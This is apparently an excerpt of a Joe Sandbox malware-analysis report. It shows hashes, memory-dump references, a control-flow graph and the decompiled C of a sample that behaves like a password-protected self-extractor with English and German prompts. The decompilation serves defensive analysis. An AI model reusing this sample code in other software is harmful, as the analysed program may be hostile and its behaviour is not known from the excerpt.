                                                                                                                                                  				 *0x40b1d0 = 0;
                                                                                                                                                  				return _t2;
                                                                                                                                                  			}





                                                                                                                                                  0x00403cc0
                                                                                                                                                  0x00403cc6
                                                                                                                                                  0x00403ccc
                                                                                                                                                  0x00403cd6

                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(00000000,00401BC3,00401BA9,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                                                                                                                                  • Instruction ID: d47e0acefe1b07befbc1d549b34453376f7af543b511f3b2cf7c13f8ad3f3650
                                                                                                                                                  • Opcode Fuzzy Hash: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                                                                                                                                  • Instruction Fuzzy Hash: 51B001B9500308DBDB019FA4EE7CB557BB8F74C785F848669EE01AB260C7789414CB9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 401000-401124 memset GetModuleHandleA HeapCreate call 403000 call 407470 call 406807 call 406040 call 404ab3 call 4040e0 call 403d90 call 40393b call 403694 call 403ef0 call 403060 call 4030a0 call 403dc0 GetUserDefaultLangID VerLanguageNameA CharLowerA call 403de0 call 4030f0 call 403e30 call 4074c0 35 40112a-4011fa call 403108 * 13 0->35 36 4011ff-4012ca call 403108 * 13 0->36 87 4012cf-4012d9 call 403cd7 35->87 36->87 91 4012f6-401323 call 403b70 call 403a66 GetModuleHandleA 87->91 92 4012db-401b9f call 4036a2 87->92 101 401325 91->101 102 40138a-40139c call 4020b1 91->102 99 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 92->99 104 40132f-40133c 101->104 108 4013b5-4013d0 call 4036a2 102->108 109 40139e-4013e7 call 401bdd call 4020b1 102->109 104->102 106 40133e-401388 call 4074f0 * 2 call 403a18 call 4074f0 call 4030f0 104->106 106->104 108->99 122 4013e9-401441 call 403de0 call 4030f0 call 4020b1 109->122 123 40140f-40142a call 4036a2 109->123 137 401463-40147e call 4036a2 122->137 138 401443-401495 call 4020b1 122->138 123->99 137->99 144 4014b5-4014c7 call 4020b1 138->144 145 401497-4014b0 138->145 148 4014e7-4014f9 call 4020b1 144->148 149 4014c9-4014e2 144->149 145->144 152 401756-4017b0 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 148->152 153 4014ff-4015b0 call 404de6 call 4042bd call 4043ae call 4045b3 call 404e09 call 4045d3 148->153 149->148 174 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 152->174 175 4017b6-4017fe call 403a18 call 403de0 call 4074c0 152->175 179 4015b5-4015c3 call 40505e 153->179 221 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 174->221 222 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 174->222 201 401800-401809 175->201 202 401812 175->202 188 4015e2-4015ea 179->188 189 4015c5-4015d8 _rmdir 179->189 190 40162b-401633 188->190 191 4015ec-4015fa call 405066 188->191 189->99 197 401672-401673 190->197 198 401635-401643 call 405074 190->198 206 401628-401629 191->206 207 4015fc-401626 call 4045fc call 4030f0 call 404925 191->207 197->179 210 401671 198->210 211 401645-40166f call 4045fc call 4030f0 call 404925 198->211 201->202 208 40180b-401810 201->208 204 401814-401816 202->204 204->174 212 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 204->212 206->197 242 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 207->242 208->204 210->197 211->242 253 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 212->253 254 401869-401893 call 4074f0 call 4030f0 call 4074c0 212->254 221->99 256 401ad4-401ada call 402118 222->256 257 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 222->257 279 4016fd-40170f call 4020b1 242->279 280 4016cf-4016f8 call 4036a2 _rmdir 242->280 253->99 283 4018a0-4018b2 call 406230 254->283 284 401895-40189b call 402118 254->284 256->257 257->99 294 401711-401716 279->294 295 40171b-401751 call 401d3f 279->295 280->99 297 401998-4019aa call 406170 283->297 298 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 283->298 284->283 294->295 295->152 297->253 309 4019ac-4019c1 call 406250 call 405fd0 297->309 298->297 328 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 298->328 309->253 328->99
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E00401000(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				void _t9;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  				CHAR* _t62;
                                                                                                                                                  				int _t64;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				int _t70;
                                                                                                                                                  				CHAR* _t73;
                                                                                                                                                  				intOrPtr _t74;
                                                                                                                                                  				CHAR* _t75;
                                                                                                                                                  				int _t76;
                                                                                                                                                  				int _t78;
                                                                                                                                                  				int _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				intOrPtr _t85;
                                                                                                                                                  				int _t88;
                                                                                                                                                  				int _t94;
                                                                                                                                                  				intOrPtr _t108;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				intOrPtr _t113;
                                                                                                                                                  				intOrPtr _t115;
                                                                                                                                                  				int _t118;
                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  				intOrPtr _t126;
                                                                                                                                                  				intOrPtr _t127;
                                                                                                                                                  				void* _t129;
                                                                                                                                                  				intOrPtr _t146;
                                                                                                                                                  				intOrPtr _t147;
                                                                                                                                                  				intOrPtr _t148;
                                                                                                                                                  				void* _t150;
                                                                                                                                                  				intOrPtr _t163;
                                                                                                                                                  				intOrPtr _t167;
                                                                                                                                                  				void* _t168;
                                                                                                                                                  				intOrPtr _t169;
                                                                                                                                                  				intOrPtr _t171;
                                                                                                                                                  				int _t174;
                                                                                                                                                  				CHAR* _t177;
                                                                                                                                                  				intOrPtr _t181;
                                                                                                                                                  				CHAR* _t185;
                                                                                                                                                  				intOrPtr _t186;
                                                                                                                                                  				CHAR* _t187;
                                                                                                                                                  				CHAR* _t188;
                                                                                                                                                  				intOrPtr _t189;
                                                                                                                                                  				CHAR* _t190;
                                                                                                                                                  				intOrPtr _t193;
                                                                                                                                                  				int _t213;
                                                                                                                                                  				intOrPtr _t215;
                                                                                                                                                  				int _t216;
                                                                                                                                                  				int _t222;
                                                                                                                                                  				void* _t224;
                                                                                                                                                  				void* _t226;
                                                                                                                                                  				intOrPtr _t242;
                                                                                                                                                  				intOrPtr _t247;
                                                                                                                                                  				void* _t261;
                                                                                                                                                  				intOrPtr _t262;
                                                                                                                                                  				void* _t263;
                                                                                                                                                  				void* _t278;
                                                                                                                                                  				void* _t279;
                                                                                                                                                  				void* _t280;
                                                                                                                                                  				intOrPtr _t281;
                                                                                                                                                  				intOrPtr _t283;
                                                                                                                                                  				void* _t284;
                                                                                                                                                  				intOrPtr _t285;
                                                                                                                                                  				intOrPtr _t286;
                                                                                                                                                  				intOrPtr _t287;
                                                                                                                                                  				intOrPtr _t288;
                                                                                                                                                  				intOrPtr _t289;
                                                                                                                                                  				intOrPtr _t290;
                                                                                                                                                  				void* _t291;
                                                                                                                                                  				intOrPtr _t293;
                                                                                                                                                  				void* _t294;
                                                                                                                                                  				intOrPtr _t295;
                                                                                                                                                  				intOrPtr _t296;
                                                                                                                                                  				intOrPtr _t297;
                                                                                                                                                  				intOrPtr _t298;
                                                                                                                                                  				void* _t299;
                                                                                                                                                  				intOrPtr _t300;
                                                                                                                                                  				intOrPtr _t301;
                                                                                                                                                  				intOrPtr _t303;
                                                                                                                                                  				intOrPtr _t305;
                                                                                                                                                  				intOrPtr _t306;
                                                                                                                                                  				intOrPtr _t307;
                                                                                                                                                  				intOrPtr _t308;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  				void* _t310;
                                                                                                                                                  				void* _t312;
                                                                                                                                                  				intOrPtr _t313;
                                                                                                                                                  				void* _t316;
                                                                                                                                                  				void* _t330;
                                                                                                                                                  				void* _t331;
                                                                                                                                                  				void* _t332;
                                                                                                                                                  				intOrPtr* _t333;
                                                                                                                                                  				void* _t340;
                                                                                                                                                  
                                                                                                                                                  				_t340 = __eflags;
                                                                                                                                                  				_t331 = __esi;
                                                                                                                                                  				_t330 = __edi;
                                                                                                                                                  				_t261 = __edx;
                                                                                                                                                  				_t224 = __ecx;
                                                                                                                                                  				memset(0x40b0f8, 0, 0xc4);
                                                                                                                                                  				_t333 = _t332 + 0xc;
                                                                                                                                                  				 *0x40b0fc = GetModuleHandleA(0);
                                                                                                                                                  				_t9 = HeapCreate(0, 0x1000, 0); // executed
                                                                                                                                                  				 *0x40b0f8 = _t9;
                                                                                                                                                  				E00403000(_t261); // executed
                                                                                                                                                  				E00407470(); // executed
                                                                                                                                                  				E00406807();
                                                                                                                                                  				E00406040();
                                                                                                                                                  				E00404AB3(); // executed
                                                                                                                                                  				E004040E0(_t224); // executed
                                                                                                                                                  				E00403D90();
                                                                                                                                                  				E0040393B();
                                                                                                                                                  				E00403694();
                                                                                                                                                  				_push(7);
                                                                                                                                                  				_push(0x40a388);
                                                                                                                                                  				 *0x40b1b4 = E00403EF0(8, 0x40b1b8);
                                                                                                                                                  				_push(7);
                                                                                                                                                  				_push(0x40b1ac);
                                                                                                                                                  				_t262 =  *0x40b1ac; // 0x20412d0
                                                                                                                                                  				E00403060(_t20, _t262);
                                                                                                                                                  				E004030A0(0x401, 8, 0x40a380);
                                                                                                                                                  				 *0x40b130 = E00403DC0(0x400);
                                                                                                                                                  				VerLanguageNameA(GetUserDefaultLangID(),  *0x40b130, 8); // executed
                                                                                                                                                  				CharLowerA( *0x40b130);
                                                                                                                                                  				_t28 =  *0x40b3b0; // 0x0
                                                                                                                                                  				_push(_t28);
                                                                                                                                                  				E00403DE0( *0x40b130, 8);
                                                                                                                                                  				_t263 = _t28;
                                                                                                                                                  				E004030F0(0x40b134, _t263);
                                                                                                                                                  				E00403E30( *0x40b130);
                                                                                                                                                  				_push( *0x40b134);
                                                                                                                                                  				_pop(_t226);
                                                                                                                                                  				E004074C0(_t226, "deutsch");
                                                                                                                                                  				if(_t340 == 0) {
                                                                                                                                                  					E00403108(0x40b138, "Continue?");
                                                                                                                                                  					E00403108(0x40b13c, "Error!");
                                                                                                                                                  					E00403108(0x40b140, "Can not create some of your include files.");
                                                                                                                                                  					E00403108(0x40b144, "Can not allocate the memory.");
                                                                                                                                                  					E00403108(0x40b148, "Wrong password.");
                                                                                                                                                  					E00403108(0x40b14c, "Overwrite?");
                                                                                                                                                  					E00403108(0x40b150, "The file ");
                                                                                                                                                  					E00403108(0x40b154, " already exists in the current directory. Overwrite?");
                                                                                                                                                  					E00403108(0x40b158, "An unknown error occured. The program will be terminated.");
                                                                                                                                                  					E00403108(0x40b15c, "This program is not supported on this operating system.");
                                                                                                                                                  					E00403108(0x40b160, "Choose a location to save the files.");
                                                                                                                                                  					E00403108(0x40b164, "Password");
                                                                                                                                                  					_t239 = 0x40b168;
                                                                                                                                                  					E00403108(0x40b168, "Please enter the password.");
                                                                                                                                                  				} else {
                                                                                                                                                  					E00403108(0x40b138, "Fortfahren?");
                                                                                                                                                  					E00403108(0x40b13c, "Fehler!");
                                                                                                                                                  					E00403108(0x40b140, "Einige Include Dateien konnten nicht erstellt werden.");
                                                                                                                                                  					E00403108(0x40b144, 0x40a178);
                                                                                                                                                  					E00403108(0x40b148, "Falsches Passwort.");
                                                                                                                                                  					E00403108(0x40b14c, 0x40a113);
                                                                                                                                                  					E00403108(0x40b150, "Die Datei ");
                                                                                                                                                  					E00403108(0x40b154, 0x40a24e);
                                                                                                                                                  					E00403108(0x40b158, "Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.");
                                                                                                                                                  					E00403108(0x40b15c, 0x40a294);
                                                                                                                                                  					E00403108(0x40b160, 0x40a03b);
                                                                                                                                                  					E00403108(0x40b164, "Passwort");
                                                                                                                                                  					_t239 = 0x40b168;
                                                                                                                                                  					E00403108(0x40b168, "Bitte geben Sie das Passwort ein.");
                                                                                                                                                  				}
                                                                                                                                                  				if(E00403CD7() >= 0x32) {
                                                                                                                                                  					E00403B70(E0040208E);
                                                                                                                                                  					 *0x40b170 = E00403A66(_t239);
                                                                                                                                                  					 *0x40b174 = GetModuleHandleA(0);
                                                                                                                                                  					_t213 =  *0x40b170; // 0x0
                                                                                                                                                  					__eflags = _t213;
                                                                                                                                                  					if(_t213 > 0) {
                                                                                                                                                  						 *0x40b178 = 0;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t222 =  *0x40b170; // 0x0
                                                                                                                                                  							__eflags = _t222 - 1 -  *0x40b178; // 0x0
                                                                                                                                                  							if(__eflags < 0) {
                                                                                                                                                  								goto L9;
                                                                                                                                                  							}
                                                                                                                                                  							_t313 =  *0x40b17c; // 0x0
                                                                                                                                                  							_push( *0x40b3b0);
                                                                                                                                                  							E004074F0(_t313);
                                                                                                                                                  							E004074F0(0x40a011);
                                                                                                                                                  							_t193 =  *0x40b3b0; // 0x0
                                                                                                                                                  							E00403A18(_t239,  *0x40b178, _t193);
                                                                                                                                                  							E004074F0("\" ");
                                                                                                                                                  							_t239 = 0x40b17c;
                                                                                                                                                  							_t316 = _t193;
                                                                                                                                                  							E004030F0(0x40b17c, _t316);
                                                                                                                                                  							 *0x40b178 =  *0x40b178 + 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L9:
                                                                                                                                                  					__eflags = E004020B1( *0x40b174, "OPS");
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						_push(0x10);
                                                                                                                                                  						E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                  						ExitProcess(1);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t62 =  *0x40b130; // 0x40c154
                                                                                                                                                  						 *0x40b180 = _t62;
                                                                                                                                                  						E00401BDD(__eflags,  *0x40b180);
                                                                                                                                                  						_t64 = E004020B1( *0x40b174, "NOPS");
                                                                                                                                                  						__eflags = _t64;
                                                                                                                                                  						if(_t64 == 0) {
                                                                                                                                                  							_push(0x10);
                                                                                                                                                  							E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                  							ExitProcess(1);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t67 =  *0x40b3b0; // 0x0
                                                                                                                                                  							_push(_t67);
                                                                                                                                                  							E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                  							_t239 = 0x40b184;
                                                                                                                                                  							_t278 = _t67;
                                                                                                                                                  							E004030F0(0x40b184, _t278);
                                                                                                                                                  							_t70 = E004020B1( *0x40b174, "BDFINOPS");
                                                                                                                                                  							__eflags = _t70;
                                                                                                                                                  							if(_t70 == 0) {
                                                                                                                                                  								_push(0x10);
                                                                                                                                                  								E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                  								ExitProcess(1);
                                                                                                                                                  							} else {
                                                                                                                                                  								_t73 =  *0x40b130; // 0x40c154
                                                                                                                                                  								 *0x40b188 = _t73;
                                                                                                                                                  								_t74 =  *0x40b16c; // 0x15c
                                                                                                                                                  								 *0x40b110 = _t74;
                                                                                                                                                  								_t75 =  *0x40b188; // 0x40c154
                                                                                                                                                  								 *0x40b104 = _t75;
                                                                                                                                                  								_t76 = E004020B1( *0x40b174, "INOPS");
                                                                                                                                                  								__eflags = _t76;
                                                                                                                                                  								if(_t76 != 0) {
                                                                                                                                                  									_t188 =  *0x40b130; // 0x40c154
                                                                                                                                                  									 *0x40b18c = _t188;
                                                                                                                                                  									_t189 =  *0x40b16c; // 0x15c
                                                                                                                                                  									 *0x40b114 = _t189;
                                                                                                                                                  									_t190 =  *0x40b18c; // 0x0
                                                                                                                                                  									 *0x40b108 = _t190;
                                                                                                                                                  								}
                                                                                                                                                  								_t78 = E004020B1( *0x40b174, "FINOPS");
                                                                                                                                                  								__eflags = _t78;
                                                                                                                                                  								if(_t78 != 0) {
                                                                                                                                                  									_t185 =  *0x40b130; // 0x40c154
                                                                                                                                                  									 *0x40b190 = _t185;
                                                                                                                                                  									_t186 =  *0x40b16c; // 0x15c
                                                                                                                                                  									 *0x40b118 = _t186;
                                                                                                                                                  									_t187 =  *0x40b190; // 0x0
                                                                                                                                                  									 *0x40b10c = _t187;
                                                                                                                                                  								}
                                                                                                                                                  								_t80 = E004020B1( *0x40b174, 0x40a0c8);
                                                                                                                                                  								__eflags = _t80;
                                                                                                                                                  								if(_t80 == 0) {
                                                                                                                                                  									L40:
                                                                                                                                                  									_t82 =  *0x40b3b0; // 0x0
                                                                                                                                                  									_push(_t82);
                                                                                                                                                  									E00403DE0( *0x40b104,  *0x40b110);
                                                                                                                                                  									_t279 = _t82;
                                                                                                                                                  									E004030F0(0x40b19c, _t279);
                                                                                                                                                  									_t85 =  *0x40b3b0; // 0x0
                                                                                                                                                  									_push(_t85);
                                                                                                                                                  									E00403DE0( *0x40b108,  *0x40b114);
                                                                                                                                                  									_t280 = _t85;
                                                                                                                                                  									E004030F0(0x40b1a0, _t280);
                                                                                                                                                  									_t88 = E004020B1( *0x40b174, "DFINOPS");
                                                                                                                                                  									__eflags = _t88;
                                                                                                                                                  									if(_t88 == 0) {
                                                                                                                                                  										L55:
                                                                                                                                                  										_t281 =  *0x40b12c; // 0x21d4838
                                                                                                                                                  										_push( *0x40b3b0);
                                                                                                                                                  										E004074F0(_t281);
                                                                                                                                                  										E004074F0(0x40a0ba);
                                                                                                                                                  										_t283 =  *0x40b184; // 0x21d49e0
                                                                                                                                                  										E004074F0(_t283);
                                                                                                                                                  										_t239 = 0x40b184;
                                                                                                                                                  										_pop(_t284);
                                                                                                                                                  										E004030F0(0x40b184, _t284);
                                                                                                                                                  										_push( *0x40b184);
                                                                                                                                                  										_t94 = E00406170(__eflags, 1);
                                                                                                                                                  										__eflags = _t94;
                                                                                                                                                  										if(_t94 == 0) {
                                                                                                                                                  											E00405EA0( *0x40b184);
                                                                                                                                                  											E00402025();
                                                                                                                                                  											_push(0x10);
                                                                                                                                                  											E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                  											_push( *0x40b12c);
                                                                                                                                                  											L00403196();
                                                                                                                                                  											ExitProcess(1);
                                                                                                                                                  										} else {
                                                                                                                                                  											E00406250(_t330, 1,  *0x40b19c);
                                                                                                                                                  											E00405FD0(1);
                                                                                                                                                  											_t285 =  *0x40b1a0; // 0x21d4828
                                                                                                                                                  											_t239 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											E004074C0(0, _t285);
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												_push( *0x40b1a0);
                                                                                                                                                  												E00402118();
                                                                                                                                                  											}
                                                                                                                                                  											_push( *0x40b3b0);
                                                                                                                                                  											_t286 =  *0x40b17c; // 0x0
                                                                                                                                                  											_push( *0x40b3b0);
                                                                                                                                                  											E004074F0(_t286);
                                                                                                                                                  											_t287 =  *0x40b128; // 0x0
                                                                                                                                                  											E004074F0(_t287);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_push( *0x40b124);
                                                                                                                                                  											_push( *0x40b184);
                                                                                                                                                  											_t288 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											_v44 = _v44 + _t288;
                                                                                                                                                  											E00402761();
                                                                                                                                                  											_pop( *0x40b3b0);
                                                                                                                                                  											E00402025();
                                                                                                                                                  											E00405EA0( *0x40b184); // executed
                                                                                                                                                  											_push( *0x40b3b0);
                                                                                                                                                  											_t108 =  *0x40b3b0; // 0x0
                                                                                                                                                  											E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_t289 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											 *_t333 =  *_t333 + _t289;
                                                                                                                                                  											_t110 = E00405E15(_t108, _t108);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_t290 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											 *_t333 =  *_t333 + _t290; // executed
                                                                                                                                                  											E00405E90(_t110,  *0x40b3b0); // executed
                                                                                                                                                  											_pop( *0x40b3b0);
                                                                                                                                                  											_push( *0x40b12c); // executed
                                                                                                                                                  											L00403196(); // executed
                                                                                                                                                  											ExitProcess(0);
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t113 =  *0x40b3b0; // 0x0
                                                                                                                                                  										_push(_t113);
                                                                                                                                                  										E00403A18(0x40b1a0, 0, _t113);
                                                                                                                                                  										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  										_t115 =  *0x40b3b0; // 0x0
                                                                                                                                                  										E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                  										_t291 = _t115;
                                                                                                                                                  										_t242 = _t115;
                                                                                                                                                  										 *0x40b3b0 = _t242;
                                                                                                                                                  										_t243 = _t242 +  *0x40a390;
                                                                                                                                                  										__eflags = _t291 +  *0x40a390;
                                                                                                                                                  										E004074C0(_t242 +  *0x40a390, _t291 +  *0x40a390);
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											L44:
                                                                                                                                                  											_t118 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t216 =  *0x40b170; // 0x0
                                                                                                                                                  											__eflags = _t216 - 1;
                                                                                                                                                  											if(_t216 != 1) {
                                                                                                                                                  												goto L44;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t118 = 1;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t118;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											goto L55;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t120 =  *0x40b3b0; // 0x0
                                                                                                                                                  											_t121 =  *0x40b3b0; // 0x0
                                                                                                                                                  											E00405DD5(__eflags, _t121);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_t293 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											_v52 = _v52 + _t293;
                                                                                                                                                  											E004036F8(_t243, _t331,  *0x40b160, _t121, _t120);
                                                                                                                                                  											_t294 = _t120;
                                                                                                                                                  											E004030F0(0x40b1a4, _t294);
                                                                                                                                                  											_t295 =  *0x40b1a4; // 0x0
                                                                                                                                                  											_t239 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											E004074C0(0, _t295);
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												L54:
                                                                                                                                                  												_t126 =  *0x40b3b0; // 0x0
                                                                                                                                                  												_t127 =  *0x40b3b0; // 0x0
                                                                                                                                                  												E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  												_t296 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  												 *_t333 =  *_t333 + _t296;
                                                                                                                                                  												_t129 = E00405E15(_t127, _t127);
                                                                                                                                                  												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  												_t297 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  												 *_t333 =  *_t333 + _t297;
                                                                                                                                                  												E00405E90(_t129, _t126);
                                                                                                                                                  												 *0x40b3b0 = _t126;
                                                                                                                                                  												_push( *0x40b12c);
                                                                                                                                                  												L00403196();
                                                                                                                                                  												ExitProcess(0);
                                                                                                                                                  											} else {
                                                                                                                                                  												_t298 =  *0x40b1a4; // 0x0
                                                                                                                                                  												_push( *0x40b3b0);
                                                                                                                                                  												E004074F0(_t298);
                                                                                                                                                  												_pop(_t299);
                                                                                                                                                  												E004030F0(0x40b124, _t299);
                                                                                                                                                  												_t300 =  *0x40b1a0; // 0x21d4828
                                                                                                                                                  												_t239 = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												E004074C0(0, _t300);
                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                  													_push( *0x40b1a0);
                                                                                                                                                  													E00402118();
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = E00406230(1,  *0x40b184);
                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                  													L52:
                                                                                                                                                  													_push( *0x40b184);
                                                                                                                                                  													__eflags = E00406170(__eflags, 1);
                                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                                  														E00406250(_t330, 1,  *0x40b19c);
                                                                                                                                                  														E00405FD0(1);
                                                                                                                                                  													}
                                                                                                                                                  													goto L54;
                                                                                                                                                  												} else {
                                                                                                                                                  													E00405FD0(1);
                                                                                                                                                  													_push( *0x40b3b0);
                                                                                                                                                  													_t301 =  *0x40b150; // 0x21d0588
                                                                                                                                                  													E004074F0(_t301);
                                                                                                                                                  													E004074F0(0x40a011);
                                                                                                                                                  													_t303 =  *0x40b184; // 0x21d49e0
                                                                                                                                                  													E004074F0(_t303);
                                                                                                                                                  													E004074F0(0x40a011);
                                                                                                                                                  													_t305 =  *0x40b154; // 0x21d05a0
                                                                                                                                                  													E004074F0(_t305);
                                                                                                                                                  													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  													_t306 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  													_v52 = _v52 + _t306;
                                                                                                                                                  													_t146 = E004036A2( *0x40b14c,  *0x40b3b0);
                                                                                                                                                  													 *0x40b3b0 = 0x24;
                                                                                                                                                  													 *0x40b1a8 = _t146;
                                                                                                                                                  													_t215 =  *0x40b1a8; // 0x0
                                                                                                                                                  													__eflags = _t215 - 7;
                                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                                  														goto L52;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t147 =  *0x40b3b0; // 0x0
                                                                                                                                                  														_t148 =  *0x40b3b0; // 0x0
                                                                                                                                                  														E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  														 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  														_t307 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  														 *_t333 =  *_t333 + _t307;
                                                                                                                                                  														_t150 = E00405E15(_t148, _t148);
                                                                                                                                                  														 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  														_t308 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  														 *_t333 =  *_t333 + _t308;
                                                                                                                                                  														E00405E90(_t150, _t147);
                                                                                                                                                  														 *0x40b3b0 = _t147;
                                                                                                                                                  														_push( *0x40b12c);
                                                                                                                                                  														L00403196();
                                                                                                                                                  														ExitProcess(0);
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									E00404DE6(0, 0, 0, 0xc8, 0x6e,  *0x40b164, 0xc80001);
                                                                                                                                                  									E004042BD(1, 0x15, 0xf, 0x9e, 0x14,  *0x40b168);
                                                                                                                                                  									E004043AE(2, 0x15, 0x28, 0x9e, 0x14, 0x40a00d, 0x20);
                                                                                                                                                  									E004045B3(3, 0x3d, 0x4b, 0x4e, 0x14, "OK");
                                                                                                                                                  									E00404E09(_t239, __eflags, 0, 0xd, 4);
                                                                                                                                                  									E004045D3(2);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_push(E0040505E());
                                                                                                                                                  										__eflags = 0x10 -  *_t333;
                                                                                                                                                  										if(0x10 ==  *_t333) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = 0x332d -  *_t333;
                                                                                                                                                  										if(0x332d !=  *_t333) {
                                                                                                                                                  											__eflags = 0x332c -  *_t333;
                                                                                                                                                  											if(0x332c !=  *_t333) {
                                                                                                                                                  												goto L34;
                                                                                                                                                  											} else {
                                                                                                                                                  												_push(E00405074());
                                                                                                                                                  												__eflags = 3 -  *_t333;
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													goto L34;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t163 =  *0x40b3b0; // 0x0
                                                                                                                                                  													E004045FC(__eflags, 2, _t163);
                                                                                                                                                  													_t309 = _t163;
                                                                                                                                                  													E004030F0(0x40b194, _t309);
                                                                                                                                                  													E00404925(_t330, __eflags, 0);
                                                                                                                                                  													_t333 = _t333 + 8;
                                                                                                                                                  													goto L35;
                                                                                                                                                  												}
